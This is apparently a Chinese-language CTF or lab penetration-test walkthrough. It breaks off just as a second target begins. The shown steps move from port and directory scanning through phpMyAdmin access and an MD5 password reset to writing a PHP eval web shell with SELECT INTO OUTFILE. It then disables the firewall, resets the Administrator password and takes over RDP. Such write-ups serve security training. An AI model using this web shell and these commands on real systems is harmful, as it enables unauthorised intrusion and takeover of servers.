一、10.1.11.83
1、nmap扫描一下开放端口,排除掉那些常见特殊端口,尝试一下陌生端口,如125端口,进入登录页面:
2、尝试burp抓包,没有抓到,说明该登录页面属于前端网页,没有经过服务器;
3、用burp直接扫描目录:
(1)首先随便进入一个目录,用burp抓包;
(2)设置目录为变量,传目录字典暴破。(注意取消最后的url编码,否则/会被编码,无法暴破
)
4、对状态码是200的目录进行尝试,再次发现登录页面;尝试验证码绕过暴破,但发现验证码和登录密码在一个包里,暴破时尝试删除验证码和cookie进行暴破,但爆破没有成功:
5、尝试再次扫描/news子目录文件夹,发现phpmyadmin,进行访问,发现后台数据库:
6、查找用户登录密码的数据库,并更改密码,一般后台数据库密码会进行md5加密(可能一次也可能多次,需要进行尝试):
在ee数据库中发现user,进入浏览发现超级管理员账户:
尝试修改密码为12345,加密模式md5,点击执行,进入登录页面进行尝试:
密码错误,再次进行一次md5加密,尝试登录成功:
7、点击进入网站后台,发现系统路径,有数据库管理有系统路径,可以尝试sql语句向系统中写入一句话木马:
select '<?php @eval($_POST[x]); ?>' into outfile 'c://../../shell.php'
8、测试成功后连接antsword:
(1)首次连接失败;
(2)修改编码和解码为base64还是失败;
(3)编码解码修改为base64,并添加请求信息后连接成功(将包中的Authorization及其内容添加至蚁剑的请求信息中):
9、连接成功进去后,在rebots.txt和key.php文件中发现两个key:
10、还有一个key一般需要远程连接,搜索mstsc尝试远程连接:
(1)直连失败,没有开3389;
(2)上传开启3389的脚本进行提权,并关闭防火墙,发现需要登录密码;
netsh firewall set opmode disable //关闭防火墙
(3)终端重新设置administrator密码:
net user Administrator 111hhh.
(4)成功登录远程桌面,拿到最后一个key:
二、172.16.12.101
1、nmap扫端口